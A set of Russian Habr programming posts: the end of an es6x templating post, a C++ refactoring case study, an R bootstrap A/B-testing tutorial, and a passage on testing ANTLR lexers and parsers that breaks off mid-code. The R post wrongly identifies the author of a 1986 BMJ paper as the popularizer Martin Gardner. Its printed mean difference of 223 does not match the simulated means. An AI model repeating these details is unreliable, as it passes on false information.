```
render() {
return es6x `
Text of block
`;
}
```
Более сложный пример:
```
import Input from './input';
render() {
return
{this.props.items.map(item => {item.text}}
;
}
// преобразуется в:
render() {
return es6x `
<${Input} name='name1'
value=${this.props.value}
${this.props.inputProps}
checked
/>
${this.props.items.map(item => es6x `${item.text}`)}
`;
}
```
Как подключить
--------------
```
npm install --save es6x
```
Пакет [es6x](https://github.com/vasiliy-lector/es6x) поддерживает разные движки. Среди них **react**, **hyperscript** (h), а также (по умолчанию) универсальный вывод в json вида:
```
{
tag: 'div',
attrs: {
className: 'block'
},
children: ['Text of block']
}
```
Чтобы использовать совместно с **react** нужно указать метод вывода перед первым вызовом (в одном месте проекта):
```
import React from 'react';
import es6x from 'es6x';
es6x.setOutputMethod(React.createElement);
```
Особенности пакета es6x
-----------------------
* размер в сжатом виде около 2 кб
* шаблоны кешируются — во время первого исполнения создается кеш, который используется при повторных вызовах
* решена проблема пробельных символов внутри шаблонов, которой страдает **jsx**:
```
return
{'some text'}
{' '}
**strong**
{' '}
*emphase*
```
В примере выше, в **jsx** требуется добавлять уродливую кострукцию {' '} между словами "text", "strong" и "emphase" а в **es6x** этого не потребуется:
```
return es6x `
${'some text'}
**strong**
*emphase*
`;
```
Производительность
------------------
**es6x** поддерживает кеширование, благодаря чему, при повторном вызове с тем же шаблоном не происходит парсинга и вызов происходит намного быстрее. Повторный вызов по результатам тестирования в 10 раз быстрее первого (в случае универсального парсинга в json, в случае парсинга для react разница меньше — менее чем в 2 раза). Так же я производил сравнение с конкурентным пакетом **t7** при парсинге для **react**. Результаты:
jsx-выход: 15683 ops/sec ±1%
es6x: 11187 ops/sec ±1%
t7: 10253 ops/sec ±1% (не поддерживает многих плюшек jsx)
То есть падение производительности около 30%. Что оказалось меньше, чем я ожидал. Объясняется тем, что метод createElement достаточно тяжелый.
Пользуйтесь, сообщайте мне о багах. Всем спасибо за внимание. | https://habr.com/ru/post/317114/ | null | ru | null |
# Наследование реализации в С++. Реальная история
Привет, Хабр!
В поисках вдохновения, чем бы пополнить портфель издательства на тему С++, мы набрели на возникший словно из ниоткуда [блог](https://quuxplusone.github.io/blog/) Артура О'Дуайера, кстати, уже [написавшего](https://www.amazon.com/Mastering-17-STL-standard-components/dp/178712682X/) одну книгу по C++. Сегодняшняя публикация посвящена теме [чистого кода](https://www.piter.com/collection/all/product/chistyy-kod-sozdanie-analiz-i-refaktoring-biblioteka-programmista-45ccca). Надеемся, что вам будут интересны как сам кейс, так и автор.
Чем больше я имею дело с классическим полиморфным кодом, тем сильнее ценю «современные» идиомы, которыми он оброс – идиому невиртуального интерфейса, [принцип подстановки Лисков](https://ru.wikipedia.org/wiki/%D0%9F%D1%80%D0%B8%D0%BD%D1%86%D0%B8%D0%BF_%D0%BF%D0%BE%D0%B4%D1%81%D1%82%D0%B0%D0%BD%D0%BE%D0%B2%D0%BA%D0%B8_%D0%91%D0%B0%D1%80%D0%B1%D0%B0%D1%80%D1%8B_%D0%9B%D0%B8%D1%81%D0%BA%D0%BE%D0%B2), правило Скотта Майерса, согласно которому все классы должны быть либо абстрактными, либо финальными, правило, что любая иерархия должна быть строго двухуровневой, а также правило, согласно которому [базовые классы выражают *единство интерфейса*](https://quuxplusone.github.io/blog/2020/10/09/when-to-derive-and-overload/), а не переиспользуют реализацию.
Сегодня я хочу показать фрагмент кода, демонстрирующий, как «наследование реализации» привело к проблемам, и какие именно паттерны я применил, чтобы его распутать. К сожалению, возмутивший меня код был настолько неразборчив, что здесь я решил показать его в упрощенном и немного предметно-ориентированном виде. Постараюсь поэтапно изложить всю проблему.
Этап 1: Транзакции
------------------
Допустим, наша предметная область — “банковские транзакции.” У нас классическая полиморфная иерархия интерфейсов.
```
class Txn { ... };
class DepositTxn : public Txn { ... };
class WithdrawalTxn : public Txn { ... };
class TransferTxn : public Txn { ... };
```
У самых разных транзакций есть определенные общие API, и у транзакций каждого типа также есть собственные специфические API.
```
class Txn {
public:
AccountNumber account() const;
std::string name_on_account() const;
Money amount() const;
private:
// виртуальная всячина
};
class DepositTxn : public Txn {
public:
std::string name_of_customer() const;
};
class TransferTxn : public Txn {
public:
AccountNumber source_account() const;
};
```
Этап 2: Фильтры транзакций
--------------------------
Но на самом деле наша программа не исполняет транзакции, а отслеживает их, чтобы помечать подозрительные транзакции. Человек-оператор может выставить фильтры, соответствующие определенным критериям, например, «помечать все транзакции на сумму свыше $ 10 000» или «помечать все транзакции, выполненные от лица людей, занесенных в контрольный список W». Внутри программы мы представляем различные типы фильтров, конфигурируемые оператором, как классическую полиморфную иерархию.
```
class Filter { ... };
class AmountGtFilter : public Filter { ... };
class NameWatchlistFilter : public Filter { ... };
class AccountWatchlistFilter : public Filter { ... };
class DifferentCustomerFilter : public Filter { ... };
class AndFilter : public Filter { ... };
class OrFilter : public Filter { ... };
Все фильтры имеют ровно один и тот же публичный API.
class Filter {
public:
bool matches(const Txn& txn) const {
return do_matches(txn);
}
private:
virtual bool do_matches(const Txn&) const = 0;
};
```
Вот пример простого фильтра:
```
class AmountGtFilter : public Filter {
public:
explicit AmountGtFilter(Money x) : amount_(x) { }
private:
bool do_matches(const Txn& txn) const override {
return txn.amount() > amount_;
}
Money amount_;
};
```
Этап 3: Оступились в первый раз
-------------------------------
Оказывается, что некоторые фильтры действительно пытаются обращаться к тем API, что специфичны для конкретных транзакций – об этих API речь шла выше. Допустим, `DifferentCustomerFilter` пытается помечать любую транзакцию, где имя ее исполнителя отличается от имени, указанного в счете. Ради примера предположим, что банк строго регламентирует: снимать деньги со счета может только владелец этого счета. Поэтому лишь class `DepositTxn` беспокоится о том, чтобы записать имя клиента, совершившего транзакцию.
```
class DifferentCustomerFilter : public Filter {
bool do_matches(const Txn& txn) const override {
if (auto *dtxn = dynamic_cast(&txn)) {
return dtxn->name\_of\_customer() != dtxn->name\_on\_account();
} else {
return false;
}
}
};
```
Это классическое злоупотребление dynamic\_cast! (Классическое – потому что встречается сплошь и рядом). Чтобы поправить этот код, можно было бы попытаться применить способ из “[Classically polymorphic visit](https://quuxplusone.github.io/blog/2020/09/29/oop-visit/)” (2020-09-29), но, к сожалению, никаких улучшений не наблюдается:
```
class DifferentCustomerFilter : public Filter {
bool do_matches(const Txn& txn) const override {
my::visit(txn, [](const auto& dtxn) {
return dtxn.name\_of\_customer() != dtxn.name\_on\_account();
}, [](const auto&) {
return false;
});
}
};
```
Поэтому автора кода осенила (сарказм!) идея. Давайте реализуем в некоторых фильтрах чувствительность к регистру. Перепишем базовый класс `Filter` вот так:
```
class Filter {
public:
bool matches(const Txn& txn) const {
return my::visit(txn, [](const auto& txn) {
return do\_generic(txn) && do\_casewise(txn);
});
}
private:
virtual bool do\_generic(const Txn&) const { return true; }
virtual bool do\_casewise(const DepositTxn&) const { return true; }
virtual bool do\_casewise(const WithdrawalTxn&) const { return true; }
virtual bool do\_casewise(const TransferTxn&) const { return true; }
};
class LargeAmountFilter : public Filter {
bool do\_generic(const Txn& txn) const override {
return txn.amount() > Money::from\_dollars(10'000);
}
};
class DifferentCustomerFilter : public Filter {
bool do\_casewise(const DepositTxn& dtxn) const override {
return dtxn.name\_of\_customer() != dtxn.name\_on\_account();
}
bool do\_casewise(const WithdrawalTxn&) const override { return false; }
bool do\_casewise(const TransferTxn&) const override { return false; }
};
```
Благодаря такой “умной” тактике уменьшается объем кода, который необходимо написать в `DifferentCustomerFilter`. Но мы нарушаем один из принципов ООП, а именно, запрет на наследование реализации. Функция `Filter::do_generic(const Txn&)` ни чиста, ни финальна. Это нам еще аукнется.
Этап 4: Оступились во второй раз
Теперь сделаем фильтр, проверяющий, есть ли владелец счета в каком-либо государственном черном списке. Мы хотим проверить несколько таких списков.
```
class NameWatchlistFilter : public Filter {
protected:
bool is_flagged(std::string_view name) const {
for (const auto& list : watchlists_) {
if (std::find(list.begin(), list.end(), name) != list.end()) {
return true;
}
}
return false;
}
private:
bool do_generic(const Txn& txn) const override {
return is_flagged(txn.name_on_account());
}
std::vector> watchlists\_;
};
```
О, нам ведь нужно сделать еще один фильтр, набрасывающий более широкую сетку – он будет проверять как владельца счета, так и имя пользователя. Опять же, у автора оригинального кода возникает (сарказм!) умная идея. Зачем дублировать логику `is_flagged`, давайте лучше ее унаследуем. Наследование – это ведь просто переиспользование кода, верно?
```
class WideNetFilter : public NameWatchlistFilter {
bool do_generic(const Txn& txn) const override {
return true;
}
bool do_casewise(const DepositTxn& txn) const override {
return is_flagged(txn.name_on_account()) || is_flagged(txn.name_of_customer());
}
bool do_casewise(const WithdrawalTxn& txn) const override {
return is_flagged(txn.name_on_account());
}
bool do_casewise(const TransferTxn& txn) const override {
return is_flagged(txn.name_on_account());
}
};
```
Обратите внимание, как жутко перепутана получившаяся у нас архитектура. `NameWatchlistFilter` переопределяет `do_generic`, чтобы только проверить фамилию владельца счета, затем `WideNetFilter` переопределяет его обратно к исходному виду. (Если бы `WideNetFilter` не переопределил его обратно, то `WideNetFilter` неверно срабатывал бы при любой транзакции по внесению средств, где `name_on_account()` не помечен, а `name_of_customer()` помечен.) Это путано, но работает… пока.
Этап 5: Ряд неприятных событий
------------------------------
Этот технический долг куснул нас с такой неожиданной стороны, так как нам требовалось добавить транзакцию нового типа. Давайте сделаем класс, при помощи которого будем представлять комиссии и платежи по процентам, инициируемые самим банком.
```
class FeeTxn : public Txn { ... };
class Filter {
public:
bool matches(const Txn& txn) const {
return my::visit(txn, [](const auto& txn) {
return do\_generic(txn) && do\_casewise(txn);
});
}
private:
virtual bool do\_generic(const Txn&) const { return true; }
virtual bool do\_casewise(const DepositTxn&) const { return true; }
virtual bool do\_casewise(const WithdrawalTxn&) const { return true; }
virtual bool do\_casewise(const TransferTxn&) const { return true; }
virtual bool do\_casewise(const FeeTxn&) const { return true; }
};
```
Важнейший шаг: мы забыли обновить `WideNetFilter`, добавить к нему переопределитель для `WideNetFilter::do_casewise(const FeeTxn&) const`. В данном «игрушечном» примере такая ошибка, возможно, сразу кажется непростительной, но в реальном коде, где от одного переопределителя до другого десятки строк кода, а идиома невиртуального интерфейса не слишком ревностно соблюдается – думаю, не составит труда встретить `class WideNetFilter : public NameWatchlistFilter`, переопределяющий как `do_generic`, так и `do_casewise`, и подумать: “о, что-то здесь запутано. Вернусь к этому позже” (и никогда к этому не вернуться).
В любом случае, надеюсь, вы уже убедились, что к этому моменту у нас получился монстр. Как нам теперь его расколдовать?
**Делаем рефакторинг, избавляемся от наследования реализации. Шаг 1**
Чтобы избавиться от наследования реализации в `Filter::do_casewise`, применим постулат Скотта Майерса о том, что любой виртуальный метод должен быть либо чистым, либо (логически) финальным. В данном случае это компромисс, так как здесь же мы нарушаем правило о том, что иерархии должны быть неглубокими. Вводим промежуточный класс:
```
class Filter {
public:
bool matches(const Txn& txn) const {
return do_generic(txn);
}
private:
virtual bool do_generic(const Txn&) const = 0;
};
class CasewiseFilter : public Filter {
bool do_generic(const Txn&) const final {
return my::visit(txn, [](const auto& txn) {
return do\_casewise(txn);
});
}
virtual bool do\_casewise(const DepositTxn&) const = 0;
virtual bool do\_casewise(const WithdrawalTxn&) const = 0;
virtual bool do\_casewise(const TransferTxn&) const = 0;
};
```
Теперь фильтры, обеспечивающие для каждой возможной транзакции обработку с учетом регистра, могут просто наследовать от `CasewiseFilter`. Фильтры, чьи реализации являются обобщенными, по-прежнему наследуют непосредственно от `Filter`.
```
class LargeAmountFilter : public Filter {
bool do_generic(const Txn& txn) const override {
return txn.amount() > Money::from_dollars(10'000);
}
};
class DifferentCustomerFilter : public CasewiseFilter {
bool do_casewise(const DepositTxn& dtxn) const override {
return dtxn.name_of_customer() != dtxn.name_on_account();
}
bool do_casewise(const WithdrawalTxn&) const override { return false; }
bool do_casewise(const TransferTxn&) const override { return false; }
};
```
Если кто-то добавит новый тип транзакции и изменит `CasewiseFilter` так, чтобы включить в него новую перегрузку `do_casewise`, то мы увидим, что `DifferentCustomerFilter` стал абстрактным классом: нам придется иметь дело с транзакцией нового типа. Теперь компилятор помогает соблюдать правила нашей архитектуры, там, где ранее тихонько скрывал наши ошибки.
Также обратите внимание, что теперь невозможно определить `WideNetFilter` в терминах `NameWatchlistFilter`.
Делаем рефакторинг, избавляемся от наследования реализации. Шаг 2
-----------------------------------------------------------------
Чтобы избавиться от наследования реализации в `WideNetFilter`, применим *принцип единственной ответственности*. На данный момент `NameWatchlistFilter` решает две задачи: работает в качестве полноценного фильтра и владеет возможностью `is_flagged`. Давайте выделим `is_flagged` в самостоятельный класс `WatchlistGroup`, которому не требуется соответствовать API `class Filter`, так как он не фильтр, а просто полезный вспомогательный класс.
```
class WatchlistGroup {
public:
bool is_flagged(std::string_view name) const {
for (const auto& list : watchlists_) {
if (std::find(list.begin(), list.end(), name) != list.end()) {
return true;
}
}
return false;
}
private:
std::vector> watchlists\_;
};
```
Теперь `WideNetFilter` может использовать `is_flagged`, не наследуя `NameWatchlistFilter`. В обоих фильтрах можно следовать известной рекомендации и предпочитать композицию наследованию, так как композиция – это инструмент для переиспользования кода, а наследование – нет.
```
class NameWatchlistFilter : public Filter {
bool do_generic(const Txn& txn) const override {
return wg_.is_flagged(txn.name_on_account());
}
WatchlistGroup wg_;
};
class WideNetFilter : public CasewiseFilter {
bool do_casewise(const DepositTxn& txn) const override {
return wg_.is_flagged(txn.name_on_account()) || wg_.is_flagged(txn.name_of_customer());
}
bool do_casewise(const WithdrawalTxn& txn) const override {
return wg_.is_flagged(txn.name_on_account());
}
bool do_casewise(const TransferTxn& txn) const override {
return wg_.is_flagged(txn.name_on_account());
}
WatchlistGroup wg_;
};
```
Опять же, если кто-то добавит новый тип транзакций и модифицирует `CasewiseFilter`, чтобы включить в него новую перегрузку `do_casewise`, то мы убедимся, что `WideNetFilter` стал абстрактным классом: нам приходится иметь дело с транзакциями нового типа в `WideNetFilter` (но не в `NameWatchlistFilter`). Словно компилятор сам ведет для нас список дел!
Выводы
------
Я анонимизировал и исключительно упростил этот пример по сравнению с тем кодом, с которым мне пришлось работать. Но общие очертания иерархии классов были именно такими, равно как и хлипкая логика `do_generic(txn) && do_casewise(txn)` из оригинального кода. Думаю, из изложенного не так легко понять, насколько незаметно в старой структуре прятался баг `FeeTxn`. Теперь, когда я изложил перед вами эту упрощенную версию (буквально разжевал ее вам!), я уже и сам практически удивляюсь, а так ли плоха была исходная версия кода? Может и нет… в конце концов, этот код же работал какое-то время.
Но, надеюсь, вы согласитесь, что версия после рефакторинга, использующая `CasewiseFilter` и особенно `WatchlistGroup`, получилась гораздо лучше. Если бы мне пришлось выбирать, с какой из двух этих баз кода работать, то я без колебаний взял бы вторую. | https://habr.com/ru/post/524882/ | null | ru | null |
# Использование вычислительных возможностей R для проверки гипотезы о равенстве средних
Возникла недавно потребность решить вроде бы классическую задачу мат. статистики.
Проводится испытание определенного push воздействия на группу людей. Необходимо оценить наличие эффекта. Конечно, можно делать это с помощью вероятностного подхода.
Но рассуждать с бизнесом о нулевых гипотезах и значении p-value совершенно бесполезно и контрпродуктивно.
Как можно по состоянию на февраль 2019 года сделать это максимально просто и быстро имея под руками ноутбук «средней руки»? Заметка реферативная, формул нет.
Является продолжением [предыдущих публикаций](https://habrahabr.ru/users/i_shutov/posts/).
Постановка задачи
=================
Есть две статистически идентичные по измеряемому показателю группы пользователей (A и B). На группу B оказывается воздействие. Приводит ли это воздействие к изменению среднего значения измеряемому показателю?
Наиболее популярный вариант — посчитать статистические критерии и сделать вывод. Мне нравится пример ["Классические методы статистики: критерий хи-квадрат"](https://r-analytics.blogspot.com/2012/08/blog-post.html). При этом совершенно неважно как это выполняется, с помощью спец. программ, Excel, R или еще чего-либо.
Однако, в достоверности получаемых выводов можно очень сильно сомневаться по следующим причинам:
1. В действительности мат. статистику мало кто понимает от начала и до конца. Всегда надо держать в голове условия при которых можно применять те или иные методы.
2. Как правило, использование инструментов и трактовка получаемых результатов идет по приципу однократного вычисления и принятия «светофорного» решения. Чем меньше вопросов, тем лучше для всех участников процесса.
Критика p-value
---------------
Материалов масса, ссылки на наиболее эффектные из найденных:
* Nature. [Scientific method: Statistical errors. P values, the 'gold standard' of statistical validity, are not as reliable as many scientists assume., Regina Nuzzo. Nature 506, 150–152](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC1339793/)
* Nature Methods. [The fickle P value generates irreproducible results, Lewis G Halsey, Douglas Curran-Everett, Sarah L Vowler & Gordon B Drummond. Nature Methods volume 12, pages 179–185 (2015)](https://www.nature.com/articles/nmeth.3288)
* ELSEVIER. [A Dirty Dozen: Twelve P-Value Misconceptions, Steven Goodman. Seminars in Hematology Volume 45, Issue 3, July 2008, Pages 135-140](https://doi.org/10.1053/j.seminhematol.2008.04.003)
Что можно сделать?
==================
Сейчас у каждого есть компьютер под руками, поэтому метод Монте-Карло спасает ситуацию. От расчетов p-value переходим к расчету доверительных интервалов (confidence interval) для разницы среднего.
Книг и материалов множество, но в двух словах (resamapling & fitting) очень компактно изложено в докладе [Jake Vanderplas — «Statistics for Hackers» — PyCon 2016](https://www.youtube.com/watch?v=Iq9DzN6mvYA&t=4s). Сама [презентация](https://speakerdeck.com/jakevdp/statistics-for-hackers).
Одна из начальных работ по этой теме, включая предложения по графической визуализации, была написана хорошо известным в советское время популяризатором математики Мартином Гарднером: [Confidence intervals rather than P values: estimation rather than hypothesis testing. M.J. Gardner and D.G. Altman, Br Med J (Clin Res Ed). 1986 Mar 15; 292(6522): 746–750](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC1339793/).
Как использовать для этой задачи R?
===================================
Чтобы не делать все руками на нижнем уровне, посмотрим на текущее состояние экосистемы. Не так давно на R был переложен весьма удобный пакет [`dabestr`: Data Analysis using Bootstrap-Coupled Estimation](https://cran.r-project.org/web/packages/dabestr/index.html).
Принципы вычислений и анализа результатов, используемых в `dabestr` в формате шпаргалок описаны здесь:[ESTIMATION STATISTICS BETA ANALYZE YOUR DATA WITH EFFECT SIZES](http://www.estimationstats.com/).
**Пример R Notebook для «пощупать»:**
```
---
title: "A/B тестирование средствами bootstrap"
output:
html_notebook:
self_contained: TRUE
editor_options:
chunk_output_type: inline
---
```
```
library(tidyverse)
library(magrittr)
library(tictoc)
library(glue)
library(dabestr)
```
Cимуляция
=========
Создадим логнормальное распределение длительности операций.
```
my_rlnorm <- function(n, mean, sd){
# пересчитываем мат. моменты: https://en.wikipedia.org/wiki/Log-normal_distribution#Arithmetic_moments
location <- log(mean^2 / sqrt(sd^2 + mean^2))
shape <- sqrt(log(1 + (sd^2 / mean^2)))
print(paste("location:", location))
print(paste("shape:", shape))
rlnorm(n, location, shape)
}
# N пользователей категории (A = Control)
A_control <- my_rlnorm(n = 10^3, mean = 500, sd = 150) %T>%
{print(glue("mean = {mean(.)}; sd = {sd(.)}"))}
# N пользователей категории (B = Test)
B_test <- my_rlnorm(n = 10^3, mean = 525, sd = 150) %T>%
{print(glue("mean = {mean(.)}; sd = {sd(.)}"))}
```
Собираем данные в виде, необходимом для анализа средствами `dabestr`, и проводим анализ.
```
df <- tibble(Control = A_control, Test = B_test) %>%
gather(key = "group", value = "value")
tic("bootstrapping")
two_group_unpaired <- df %>%
dabest(group, value,
# The idx below passes "Control" as the control group,
# and "Test" as the test group. The mean difference
# will be computed as mean(Test) - mean(Control).
idx = c("Control", "Test"),
paired = FALSE,
reps = 5000
)
toc()
```
Поглядим на результаты
```
two_group_unpaired
plot(two_group_unpaired)
```
======================================================
Результат в виде CI
```
DABEST (Data Analysis with Bootstrap Estimation) v0.2.0
=======================================================
Unpaired mean difference of Test (n=1000) minus Control (n=1000)
223 [95CI 209; 236]
5000 bootstrap resamples.
All confidence intervals are bias-corrected and accelerated.
```
и картинки

вполне понятен и удобен для разговора с бизнесом. Всех расчетов было на «выпить чашечку кофе».
Предыдущая публикация — [«Data Science «спецназ» собственными силами»](https://habr.com/ru/post/440700/). | https://habr.com/ru/post/441192/ | null | ru | null |
# Идеальный SAST. Тестируем парсеры
Пока индексируется github (спасибо лимиту в 5000 запросов в час), который нужен для получения данных для статьи, поговорим пока о тестировании лексеров и парсеров. Обсудим пожелания к процессу разработки грамматик, их тестирования и контроля качества так, что бы не превращаться в существо на картинке.
Типичный разработчик парсеровОсновной проблемой разработки парсеров является высокая вариативность входных данных, комбинации элементов языка могут и с ума свести, особенно если это какой-нибудь С++. Разумеется можно брать большие массивы исходных кодов и ждать сутками, пока все проанализиуется и вы получите отчет об ошибках. Но проблема в том, что нужно TDD, причем такое, что бы максимум за 15 секунд можно было получить хотя бы 100% покрытие всех вариантов грамматики (включая комбинации). Особо следует упомянуть лексер, так как часто даже с токенами бывают проблемы.
Пример, когда даже токены стреляют тебе в ногуУчаствуя в разработке анализатора С++, стояла задача по разработке препроцессора, особенность была такой, что файлы для ускорения отладки кешировались в виде преобразованных файлов, которые можно было обычным парсером С++ анализировать, но если кеша не было, то на вход парсеру шли токены из препроцессора. Как оказалось, несмотря на то, что склейка токенов в текст давала корректный результат, сами токены были некорректными и парсер падал с ошибкой.
Для покрытия такого большого количества вариантов грамматик в столь короткое время придется рассчитывать только на малые примеры, демонстрирующие конкретную работу парсера, например:
```
class Example {
boolean flag;
}
```
Разумеется читатель может подумать, в чем смысл таких тестов, если они столь просты? Так и сам парсер является простым, но после него начинается такая жесть, которую без гарантии, что парсер точно работает как надо, отладить может оказаться очень трудно, потому что будете тратить время на лишние кейсы, которые надо проверить. В итоге время теряется на пустяки.
Очевидным преимуществом малых примеров, корректных с точки зрения парсера (или синтаксически правильных, семантику не нужно трогать), является возможность задавать таких вариантов тысячи, гарантируя, что отработают все за крайне малое время, позволяя разработчику в любой момент скомпилировать проект и запустить тесты, что бы проверить работу. Разработка парсера превращается в TDD, когда ты в начале пишешь пример для разбора, а затем пишешь правила.
Так же к достоинству можно отнести тот факт, что если что-то сломается, то человеку проще будет искать в десятке файлов нужную информацию, чем в огромном файле десяток участков, это не говоря о том, что находить дельты больших файлов - та еще проблема.
Однако есть недостаток, нужно уметь видеть какие варианты для грамматик являются уникальными наборами, вы же не будете говорить, что поменяв имя переменной в примере вы добавили новый кейс? Идентификаторы вы можете протестировать в отдельной папке, не вдаваясь в подробности этой фичи в другом месте.
Предлагаю рассмотреть следующий вариант: у нас есть язык C# и тернарный оператор, вопрос, сколько уникальных вариантов использования можно выбрать? (Можете написать в комментарии) Пока что вот вам несколько важных вариантов:
1. ID ? ID : ID
2. ID ? LITERAL : LITERAL
3. ID? ? ANY : ANY
И это только малая часть! При разработке грамматики для C# смог получить именно проблему, что парсер не справлялся с вариантом value is MyType ? var1 : var2, потому что он пытался парсить, используя знак ? не как тернарный оператор. Antlr просто не хватало глубины поиска в правилах и он не мог поймать тернарку. При этом это мелкая проблема, которую вытаскивать анализируя большие массивы информации совершенно неприемлимо. В то же время, даже если вы обнаружили такой баг на большом коде, это не помешает вытащить из него достаточно малый участок, что бы воспроизвести баг и отладить его, не заморачивась лишними данными вокруг. Что лучше, 1 раз отладится на 100 мб проекте целый час или хоть 1000 раз запустить тест на 0.001 секунду ?
Тестируем лексер
----------------
Для того, что бы точно быть уверенным в иммутабельности вывода лексера и дать гарантию следующим этапам обработки, следует закрепить вывод токенов. Этап токенизации берет на себя лексер, так же именно в этом этапе выгодно добавлять препроцессирование, так что бы на выходе можно было получить сразу готовый поток токенов. Для таких языков как С++ лексер просто необходимо запускать отдельно от парсера, что бы получать корректный вывод - иначе вы все макросы не раскроете. Соответственно для него нужно в начале все файлы прогнать через лексер, а только потом парсер.
Одним из вариантов является сохранение как есть потока результата работы лексера - токенов в файл, вот только бинарные файлы люди пока читать не научились, поэтому предлагаю использовать json, это поможет не только видеть изменения через дельты с минимальными шумами, но так же позволит автоматизировать поиск разницы.
```
{
"tokens" : [ {
"tokenType" : "PACKAGE",
"statement" : "1:0[7]"
}, {
"tokenType" : "Identifier",
"statement" : "1:8[7]",
"text" : "example"
}, {
"tokenType" : "SEMI",
"statement" : "1:15[1]"
}, {
"tokenType" : "CLASS",
"statement" : "3:0[5]"
}, {
"tokenType" : "Identifier",
"statement" : "3:6[7]",
"text" : "Example"
}, {
"tokenType" : "FoldBlock",
"statement" : "3:14[21]",
"children" : {
"tokens" : [ {
"tokenType" : "LBRACE",
"statement" : "3:14[1]"
}, {
"tokenType" : "BOOLEAN",
"statement" : "4:4[7]"
}, {
"tokenType" : "Identifier",
"statement" : "4:12[4]",
"text" : "flag"
}, {
"tokenType" : "SEMI",
"statement" : "4:16[1]"
}, {
"tokenType" : "RBRACE",
"statement" : "5:0[1]"
}, {
"tokenType" : "EOF",
"statement" : "5:1[3]"
} ]
}
}, {
"tokenType" : "EOF",
"statement" : "6:0[5]"
} ]
}
```
Уверен, что вам не составит труда обнаружить разницу, если в файле что-то поменяется или вы измените обработку токенов.
Следует отметить, что токены характеризуются не только типом, но и текстом, при это для каких-то токенов нам текст не важен, поэтому где-то необходимо хранить список типов токенов, для которых текст нужно хранить. В моем примере для этого используется ParserService, но у вас может быть даже статик, если одного языка для вас достаточно, либо вовсе вшить эти данные в тест, что отчасти не самый лучший вариант (причина будет позже).
Имея на руках такой дамп представления файла, довольно легко написать юнит-тест:
```
def testLexer(suite: Suite): Unit = {
implicit val ps: ParserService = ParserService(suite.language)
for (fi <- suite.fileInfos) {
assertFile(fi.file)
val lexerOutput: LexerOutput = readFromFile[LexerOutput](testConfig(LexerSuiteDir, suite, fi.file))
val lexer = ps.newLexer(asVirtualFile(fi))
val stream = new CommonTokenStream(lexer)
stream.fill()
val tokens = CollectionConverters.asScala(stream.getTokens)
assertTokens(lexer, lexerOutput, tokens)
}
}
private def assertTokens(lexer: AbstractRScanLexer, lexerOutput: LexerOutput, tokens: mutable.Buffer[Token]): Unit = {
val queue = new mutable.Queue[LexerOutputToken]()
queue ++= lexerOutput.tokens
for (t <- tokens) {
assertTrue(queue.nonEmpty, "Queue should not be empty")
val lot = queue.dequeue()
val tokenType = lexer.getVocabulary.getSymbolicName(t.getType)
assertEquals(lot.tokenType, tokenType, "Token types are not equal")
assertEquals(lot.statement, tokenStatement(t), "Token types are not equal")
if (lot.text != null) {
assertEquals(lot.text, t.getText, "Texts are not equal")
}
if (lot.children != null) {
assertTrue(t.isInstanceOf[RScanToken], "Must be RScanToken")
val rt = t.asInstanceOf[RScanToken]
assertTrue(rt.foldedTokens().nonEmpty, "Must have fold tokens")
assertTokens(lexer, lot.children, rt.foldedTokens().toBuffer)
} else {
assertFalse(t.isInstanceOf[RScanToken] && t.asInstanceOf[RScanToken].foldedTokens().nonEmpty, "No fold tokens allowed")
}
}
if (queue.nonEmpty && queue.head.tokenType.equals("EOF")) queue.dequeue()
assertTrue(queue.isEmpty, "Queue must be empty")
}
```
Все что мы делаем - это проверяем, что бы в потоке токенов совпадал ключ и специальный текст, если же у нас токен содержит свертку, то всего лишь рекурсивно продолжаем проверку токенов.
Выделив код в библиотеку можно добавить тестирование лексера, всего лишь написав конфигурацию для теста:
```
class JavaParserTest extends AbstractJUnitAntlr4Test {
@ParameterizedTest(name = "[{index}] {0}")
@MethodSource(Array("testFiles"))
override def testLexer(suite: Suite): Unit = {
super.testLexer(suite)
}
@ParameterizedTest(name = "[{index}] {0}")
@MethodSource(Array("testFiles"))
override def testParser(suite: Suite): Unit = {
super.testParser(suite)
}
}
object JavaParserTest {
private val TestDataDirectory = "/test/java/unit"
def testFiles: java.util.stream.Stream[Arguments] = Antlr4TestUtils.filesFromResourceDirectory(JavaLanguage.ref, TestDataDirectory, getClass, Seq("java"))
}
```
Данный тест создаст из ресурсной папки /test/java/unit коллекцию тестовых наборов данных (suite), а уже junit создаст все необходимые тесты и передаст каждый из них в качестве параметра нашему методу testLexer, вызываем затем родительский метод и вуаля - наша грамматика тестируется, и так для любого языка. Генерируем дампы и запускаем тест!
```
java -Xmx128m -Dfile.encoding=UTF-8 -classpath $CLASSPATH \
org.lastrix.rscan.test.ParserTestSuiteGenerator \
-l Java -d $TEST_PATH -e .java
```
```
./gradlew clean test
```
Тестируем парсер
----------------
Тестировать лексер - задача простая и тривиальная. Но основной сложностью при тестировании парсера является то, каким образом вы работаете с AST. Идеальным вариантом было бы работать не с сырым AST, а обогащенным, уже снабженным данными, которые позволят сократить объем выходных данных, например вот так:
```
{
"languageName" : "Java",
"items" : [ {
"keyText" : "RAW_DECL_PACKAGE at field000.java[1:0-5:1]",
"children" : [ {
"keyText" : "NAME at field000.java[1:8-1:15]",
"children" : [ {
"keyText" : "UNRESOLVED_ID at field000.java[1:8-1:15]",
"specText" : "example"
} ]
}, {
"keyText" : "RAW_DECL_CLASS at field000.java[3:0-5:1]",
"children" : [ {
"keyText" : "NAME at field000.java[3:6-3:13]",
"children" : [ {
"keyText" : "UNRESOLVED_ID at field000.java[3:6-3:13]",
"specText" : "Example"
} ]
}, {
"keyText" : "MEMBERS at field000.java[3:14-5:1]",
"children" : [ {
"keyText" : "RAW_DECL_FIELD at field000.java[4:4-4:16]",
"children" : [ {
"keyText" : "RAW_TYPE at field000.java[4:4-4:11]",
"children" : [ {
"keyText" : "UNRESOLVED_ID at field000.java[4:4-4:11]",
"specText" : "boolean"
} ]
}, {
"keyText" : "RAW_DECL_VARIABLE at field000.java[4:12-4:16]",
"children" : [ {
"keyText" : "NAME at field000.java[4:12-4:16]",
"children" : [ {
"keyText" : "UNRESOLVED_ID at field000.java[4:12-4:16]",
"specText" : "flag"
} ]
} ]
} ]
} ]
} ]
} ]
} ]
}
```
При этом любое изменение в представлении или изменении в исходном коде выльется в изменение структуры выходных данных так, что дельта изменений будет минимальной и затронет только измененные участки.
Самое простое теперь, это написать юнит-тест, что бы проверить, что парсер выдает именно то, что от него ожидают:
```
def testParser(suite: Suite): Unit = {
implicit val ps: ParserService = ParserService(suite.language)
for (fi <- suite.fileInfos) {
assertFile(fi.file)
